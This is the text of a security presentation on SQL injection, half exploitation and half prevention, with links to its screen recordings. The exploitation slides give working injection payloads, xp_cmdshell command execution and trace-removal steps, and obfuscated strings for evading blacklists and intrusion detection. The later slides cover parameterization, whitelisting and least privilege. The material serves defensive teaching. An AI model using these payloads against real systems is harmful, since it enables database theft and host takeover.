
Devouring Security Sqli Exploitation and Prevention


DESCRIPTION

Devouring Security Sqli is an exploitation and prevention presentation that I did a while back. The presentation accompanies a screen recording which could be located at http://vimeo.com/gmaran23


Page 1: Devouring Security Sqli Exploitation and Prevention

Devouring Security

Sqli Exploitation & prevention

Part 1 & 2

Marudhamaran Gunasekaran

Watch the screen recording of this presentation at

Devouring Security – Sql Injection Part 1 - http://vimeo.com/83658524 Devouring Security – Sql Injection Part 2 – http://vimeo.com/85256464

Page 2: Devouring Security Sqli Exploitation and Prevention

Security

Feeling

Reality

Trade offs

Wisdom

Ignorance is no excuse

Page 3: Devouring Security Sqli Exploitation and Prevention

Disclaimer

Techniques and Tools in this presentation should be used or applied on an application, only with prior consent of the application’s owner.

Illegal otherwise.

Page 4: Devouring Security Sqli Exploitation and Prevention

Sqli – Media coverage

http://pastebin.com/HUjZPaF3

Page 5: Devouring Security Sqli Exploitation and Prevention

Sqli – Media coverage

http://thepiratebay.se/torrent/6443601

Page 6: Devouring Security Sqli Exploitation and Prevention

Sqli – Media coverage

http://www.bloomberg.com/news/2013-01-24/sony-fined-394-000-over-2011-hacker-attack-on-playstation-data.html

Page 7: Devouring Security Sqli Exploitation and Prevention

Sqli – Media coverage

http://www.eteknix.com/turkish-hackers-claim-to-have-leaked-40000-sony-italy-account-details/

Page 8: Devouring Security Sqli Exploitation and Prevention

Sqli – Media coverage

http://news.techworld.com/security/3331283/barclays-97-percent-of-data-breaches-still-due-to-sql-injection/

Page 9: Devouring Security Sqli Exploitation and Prevention

Sqli – Media Coverage

Page 10: Devouring Security Sqli Exploitation and Prevention

Sqli – Why does it exist?

Yeah! I can develop/deploy without restrictions, I have full access.

Thanks bro! I am your uninvited database administrator now. I owe you, and your data.

I like them admin rights

Page 11: Devouring Security Sqli Exploitation and Prevention

Sqli – Why does it exist?

Conglomeration of Sensitive Data

Would you keep all your belongings in your home, or would you keep some in your safe deposit box?

Blindly Trusting Unsanitized User Input

"Over thousands of queries in a moderate- to large-size application, that 2% can result in a handful of SQL injections," Chou says. "All an attacker needs to do is find one of these, and you'll have millions of records stolen and a headline in Dark Reading."

Page 12: Devouring Security Sqli Exploitation and Prevention

Sqli – Why does it exist?

• It's not always about a developer knowing better; there are tons and tons of legacy code
• Remember, DBAs write SQL too
• No strict access control policies
• Windows based/Desktop based applications are directly ported to the web
• Developers still don't know the complete truths about Sqli

Page 13: Devouring Security Sqli Exploitation and Prevention

Sqli 101

../Products?name=rat

SELECT 1 FROM Products WHERE ProductName = 'rat'

../Products?name=rat' or 1=1 --

SELECT 1 FROM Products WHERE ProductName = 'rat' or 1=1 -- '

or true

Page 14: Devouring Security Sqli Exploitation and Prevention

Sqli 101

• http://sqli:8020/Sqli/

• http://localhost/WebGoat/attack?Screen=147&menu=1100&stage=1

Page 15: Devouring Security Sqli Exploitation and Prevention

Sqli U

Page 16: Devouring Security Sqli Exploitation and Prevention

Sqli U

http://sqli:8020/Sqli/ProductSearch

Page 17: Devouring Security Sqli Exploitation and Prevention

Sqli E

Page 18: Devouring Security Sqli Exploitation and Prevention

Sqli E

http://sqli:8020/SqliErrorRiddle/

Page 19: Devouring Security Sqli Exploitation and Prevention

Sqli E

-- table enumerator
SELECT TOP 1 Convert(INT, NAME)
FROM sys.tables
WHERE object_id = (
    SELECT TOP 1 object_id
    FROM (
        SELECT TOP 2 object_id
        FROM sys.tables
        ORDER BY object_id) AS TEMP
    ORDER BY object_id DESC)

Enumerating in MySQL is very easy with OFFSET.

Page 20: Devouring Security Sqli Exploitation and Prevention

ORMs and SPs Loopholes

http://sqli:8020/SqliORM/ProductSearch

Page 21: Devouring Security Sqli Exploitation and Prevention

It’s not an ORM’s problem to have you loaded with features

ALTER PROCEDURE SearchProducts (@Item VARCHAR(100))
AS
BEGIN
    DECLARE @query VARCHAR(400)
    SET @query = 'SELECT * FROM Products WHERE ProductName LIKE ''%' + @Item + '%'''
    PRINT @query
    EXEC (@query)
END
GO
---------------------------------------------------------------
-- Execute good
EXEC SearchProducts 'chai'
GO
-- Execute bad
EXEC SearchProducts 'chai%'' or 1=1--'
GO

Page 22: Devouring Security Sqli Exploitation and Prevention

Fixing SP Loopholes

ALTER PROCEDURE SearchProductsBetter (@Item VARCHAR(200))
AS
BEGIN
    DECLARE @safequery NVARCHAR(400)
    DECLARE @params NVARCHAR(200)
    SET @safequery = N'SELECT * FROM Products WHERE ProductName LIKE ''%'' + @param1 + ''%'''
    SET @params = N'@param1 NVARCHAR(200)';
    EXECUTE SP_EXECUTESQL @safequery, @params, @param1 = @Item
END
GO
---------------------------------------------------------------
-- Execute bad
EXEC SearchProductsBetter 'chai%'' or 1=1--'
GO

Page 23: Devouring Security Sqli Exploitation and Prevention

Profiling Host OS

• Privilege misuse and rooting

Page 24: Devouring Security Sqli Exploitation and Prevention

Profiling Host OS

-- enable command shell
EXEC sp_configure 'show advanced options', 1;
RECONFIGURE;
EXEC sp_configure 'xp_cmdshell', 1;
RECONFIGURE;

-- disable command shell
EXEC sp_configure 'show advanced options', 1;
RECONFIGURE;
EXEC sp_configure 'xp_cmdshell', 0;
RECONFIGURE;

Page 25: Devouring Security Sqli Exploitation and Prevention

Profiling Host OS

-- play time!
exec xp_cmdshell 'tasklist'

exec master.dbo.xp_cmdshell 'whoami'

exec xp_cmdshell 'netsh advfirewall firewall show rule name=all profile=public'

Page 26: Devouring Security Sqli Exploitation and Prevention

Profiling Host OS

-- enumerate and remove trace
create table tempsz(temp varchar(MAX));
insert into tempsz exec xp_cmdshell 'tasklist';
select * from tempsz;
drop table tempsz;

-- enumerate and leave trace
create table tempsz(temp varchar(MAX));
insert into tempsz exec xp_cmdshell 'tasklist';

-- get enumerated information and remove trace
select temp from tempsz;
drop table tempsz;

Page 27: Devouring Security Sqli Exploitation and Prevention

Profiling Host OS

-- schedule a shutdown and send message to the user named maran

exec xp_cmdshell 'shutdown -s -t 6000'; exec xp_cmdshell 'msg maran You will be shut down in 100 minutes'

-- abort the shutdown and send message to the user named maran

exec xp_cmdshell 'shutdown -a'; exec xp_cmdshell 'msg maran I have heard your prayer. You are salvaged'

Page 28: Devouring Security Sqli Exploitation and Prevention

Profiling Host OS

OSCommand_Run in Oracle does the equivalent of xp_cmdshell in Sql server.

Page 29: Devouring Security Sqli Exploitation and Prevention

Sqli T

Just biding time, my friend

Page 30: Devouring Security Sqli Exploitation and Prevention

Sqli T

Oracle: DBMS_LOCK.sleep

TSql: WAITFOR DELAY

MySql: BENCHMARK

Page 31: Devouring Security Sqli Exploitation and Prevention

Sqli B

Blind, but I could get by

Page 32: Devouring Security Sqli Exploitation and Prevention

Sqli B

Blind, not as fast, but I could travel miles

Page 33: Devouring Security Sqli Exploitation and Prevention

IDS Evasive Techniques

'485'="485"
'5'>'1'
"QSNR"="QSNR"
REPLACE('SEL/**/CT', '/**/', '')

Page 34: Devouring Security Sqli Exploitation and Prevention

Blacklist Filter Evasion

';exec xP_cMdsheLL 'dir';--

';ex/**/ec xp_cmds/**/hell 'dir';-- [old versions]

';exec/**/xp_cmdshell/**/'dir';--

';Declare @cmd as varchar(3000);Set @cmd = 'x'+'p'+'_'+'c'+'m'+'d'+'s'+'h'+'e'+'l'+'l'+'/**/'+''''+'d'+'i'+'r'+'''';exec(@cmd);--

Page 35: Devouring Security Sqli Exploitation and Prevention

Blacklist Filter Evasion

Declare @cmd as varchar(3000);
Set @cmd = (CHAR(101)+CHAR(120)+CHAR(101)+CHAR(99)+CHAR(32)+CHAR(109)+CHAR(97)+CHAR(115)+CHAR(116)+CHAR(101)+CHAR(114)+CHAR(46)+CHAR(46)+CHAR(120)+CHAR(112)+CHAR(95)+CHAR(99)+CHAR(109)+CHAR(100)+CHAR(115)+CHAR(104)+CHAR(101)+CHAR(108)+CHAR(108)+CHAR(32)+CHAR(39)+CHAR(100)+CHAR(105)+CHAR(114)+CHAR(39)+CHAR(59));
EXEC(@cmd);--

EXEC (exec master..xp_cmdshell 'dir')

Page 36: Devouring Security Sqli Exploitation and Prevention

Sqli Exploitation tools

• Sqlmap
• sqlninja
• Safe3SI
• Enema
• Havij
• Pangolin
• BSQL Hacker
• ... and a lot more

Page 37: Devouring Security Sqli Exploitation and Prevention

Sqli Exploitation tools

Demonstration

1. Safe3SI
2. Enema
3. Sqlmap

Page 38: Devouring Security Sqli Exploitation and Prevention

Sqli Feeble Fixes

Blacklisting is suicide

IDSs are not very effective for Sqli

Page 39: Devouring Security Sqli Exploitation and Prevention

Feeble Fixes

Blacklisting

(can’t filter all possible dangerous inputs like below)

"QSNR"="QSNR"
REPLACE('SEL/**/CT', '/**/', '')

Page 40: Devouring Security Sqli Exploitation and Prevention

Blacklisting for Death

Page 41: Devouring Security Sqli Exploitation and Prevention

Blacklisting for Death

Page 42: Devouring Security Sqli Exploitation and Prevention

Blacklisting for Death

Page 43: Devouring Security Sqli Exploitation and Prevention
Page 44: Devouring Security Sqli Exploitation and Prevention

Sqli Prevention

Page 45: Devouring Security Sqli Exploitation and Prevention

Sqli Prevention

Exploitation tools

Fuzzers

Active/Passive vulnerability scanners

Page 46: Devouring Security Sqli Exploitation and Prevention

Core Defense

Input validation with a whitelist, type casting and/or RegEx.

Page 47: Devouring Security Sqli Exploitation and Prevention

Core Defense Validation with RegEx

Page 48: Devouring Security Sqli Exploitation and Prevention

Core Defense

CREATE PROCEDURE dbo.doQuery (@id NCHAR(4))
AS
DECLARE @query NCHAR(64)
-- whitelist: accept the id only if it is exactly four digits
IF RTRIM(@id) LIKE '[0-9][0-9][0-9][0-9]'
BEGIN
    SELECT @query = 'select ccnum from cust where id = ''' + @id + ''''
    EXEC (@query)
END
RETURN

-- Or, better yet, force an integer parameter
CREATE PROCEDURE dbo.doQuery(@id smallint)

Page 49: Devouring Security Sqli Exploitation and Prevention

Core Defense

Parameterization, a.k.a. prepared statements

[refer to your framework for support]
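The SearchProducts / SearchProductsBetter contrast and the four-digit allowlist from doQuery, rebuilt as an added example that is not part of the slides: it uses Python with an in-memory SQLite table (constructed sample rows) in place of SQL Server, and the function names are mine.

```python
import re
import sqlite3

# Constructed sample rows standing in for the slides' Products table.
PRODUCTS = [(1001, "Chai"), (1002, "Chang"), (1003, "Aniseed Syrup")]


def make_db():
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE Products (id INTEGER, ProductName TEXT)")
    con.executemany("INSERT INTO Products VALUES (?, ?)", PRODUCTS)
    return con


def search_vulnerable(con, item):
    # Like SearchProducts: the term is glued into the SQL text, so a quote in
    # the input closes the literal and the rest of the input runs as SQL.
    sql = "SELECT ProductName FROM Products WHERE ProductName LIKE '%" + item + "%'"
    return [row[0] for row in con.execute(sql)]


def search_parameterized(con, item):
    # Like SearchProductsBetter / sp_executesql: the pattern is bound as a
    # parameter, so the input is only ever data and cannot alter the query.
    sql = "SELECT ProductName FROM Products WHERE ProductName LIKE ?"
    return [row[0] for row in con.execute(sql, ("%" + item + "%",))]


# Allowlist from doQuery: exactly four digits, nothing else.
FOUR_DIGITS = re.compile(r"[0-9]{4}")


def lookup_by_id(con, raw_id):
    # Validate against the allowlist, then force an integer and bind it;
    # anything that is not four digits is rejected before any SQL is built.
    if not FOUR_DIGITS.fullmatch(raw_id):
        raise ValueError("id must be exactly four digits")
    row = con.execute("SELECT ProductName FROM Products WHERE id = ?",
                      (int(raw_id),)).fetchone()
    return row[0] if row else None


if __name__ == "__main__":
    db = make_db()
    payload = "chai%' or 1=1--"               # the slides' "Execute bad" input
    print(search_vulnerable(db, payload))     # every row: the injection worked
    print(search_parameterized(db, payload))  # []: treated as a literal pattern
    print(lookup_by_id(db, "1002"))           # Chang
```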

Page 50: Devouring Security Sqli Exploitation and Prevention

Core Defense

Encrypt data to prevent disclosure when physical database files are stolen.

1. Encryption does not do a darn thing to protect you from direct Sqli
2. Encryption only protects you from Sqli induced attacks

Page 51: Devouring Security Sqli Exploitation and Prevention

Core Defense

Database user account audits

1. Selective privilege principle
2. Least privilege principle

Page 52: Devouring Security Sqli Exploitation and Prevention

Code Reviews - Spot and Stop Sqli

Page 53: Devouring Security Sqli Exploitation and Prevention

Code Reviews - Spot and Stop Sqli

Page 54: Devouring Security Sqli Exploitation and Prevention

CAT.Net Sqli Scan

Page 55: Devouring Security Sqli Exploitation and Prevention

CAT.Net Sqli Scan

MicrosoftACECodeAnalysisReport.htm

Page 56: Devouring Security Sqli Exploitation and Prevention

Netsparker community edition

Page 57: Devouring Security Sqli Exploitation and Prevention

What now?

Sqli Cheatsheet - http://ferruh.mavituna.com/sql-injection-cheatsheet-oku

Dynamic queries in T-SQL - http://www.sommarskog.se/dyn-search-2005.html

http://www.sommarskog.se/dyn-search-2008.html

Page 58: Devouring Security Sqli Exploitation and Prevention

End of the world

Watch the screen recording of this presentation at my vimeo channel

Devouring Security – Sql Injection Part 1 - http://vimeo.com/83658524

Devouring Security – Sql Injection Part 2 – http://vimeo.com/85256464